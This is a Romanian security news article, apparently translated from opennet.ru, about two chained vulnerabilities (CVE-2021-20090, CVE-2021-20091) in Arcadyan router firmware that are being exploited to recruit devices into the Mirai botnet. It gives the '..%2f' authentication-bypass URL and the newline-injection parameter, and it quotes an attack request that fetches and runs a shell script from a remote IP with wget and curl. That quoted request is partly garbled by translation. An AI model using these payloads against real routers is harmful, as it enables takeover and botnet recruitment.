Un atac masiv a fost înregistrat în rețea împotriva routerelor de acasă al căror firmware folosește o implementare de server HTTP de la compania Arcadyan. Pentru a obține controlul asupra dispozitivelor, este utilizată o combinație de două vulnerabilități care permite executarea de la distanță a codului arbitrar cu drepturi root. Problema afectează o gamă destul de largă de routere ADSL de la Arcadyan, ASUS și Buffalo, precum și dispozitivele furnizate sub mărcile Beeline (problema este confirmată în Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone și alți operatori de telecomunicații. Se observă că problema este prezentă în firmware-ul Arcadyan de mai bine de 10 ani și în acest timp a reușit să migreze la cel puțin 20 de modele de dispozitive de la 17 producători diferiți.
Prima vulnerabilitate, CVE-2021-20090, face posibilă accesarea oricărui script de interfață web fără autentificare. Esența vulnerabilității este că în interfața web, unele directoare prin care sunt trimise imagini, fișiere CSS și script-uri JavaScript sunt accesibile fără autentificare. În acest caz, directoarele pentru care este permis accesul fără autentificare sunt verificate folosind masca inițială. Specificarea caracterelor „../” în căile pentru a merge la directorul părinte este blocată de firmware, dar utilizarea combinației „..%2f” este omisă. Astfel, este posibil să deschideți pagini protejate atunci când trimiteți solicitări precum „http://192.168.1.1/images/..%2findex.htm”.
A doua vulnerabilitate, CVE-2021-20091, permite unui utilizator autentificat să facă modificări în setările de sistem ale dispozitivului prin trimiterea unor parametri special formatați către scriptul apply_abstract.cgi, care nu verifică prezența unui caracter de linie nouă în parametri. . De exemplu, atunci când efectuează o operațiune de ping, un atacator poate specifica valoarea „192.168.1.2%0AARC_SYS_TelnetdEnable=1” în câmpul cu adresa IP care este verificată și scriptul, la crearea fișierului de setări /tmp/etc/config/ .glbcfg, va scrie în ea linia „AARC_SYS_TelnetdEnable=1”, care activează serverul telnetd, care oferă acces nerestricționat la shell de comandă cu drepturi root. În mod similar, setând parametrul AARC_SYS, puteți executa orice cod de pe sistem. Prima vulnerabilitate face posibilă rularea unui script problematic fără autentificare prin accesarea acestuia ca „/images/..%2fapply_abstract.cgi”.
Pentru a exploata vulnerabilitățile, un atacator trebuie să poată trimite o solicitare către portul de rețea pe care rulează interfața web. Judecând după dinamica răspândirii atacului, mulți operatori lasă accesul pe dispozitivele lor din rețeaua externă pentru a simplifica diagnosticarea problemelor de către serviciul de asistență. Dacă accesul la interfață este limitat doar la rețeaua internă, un atac poate fi efectuat dintr-o rețea externă folosind tehnica „DNS rebinding”. Vulnerabilitățile sunt deja utilizate în mod activ pentru a conecta routerele la botnet Mirai: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Conexiune: închide User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Sursa: opennet.ru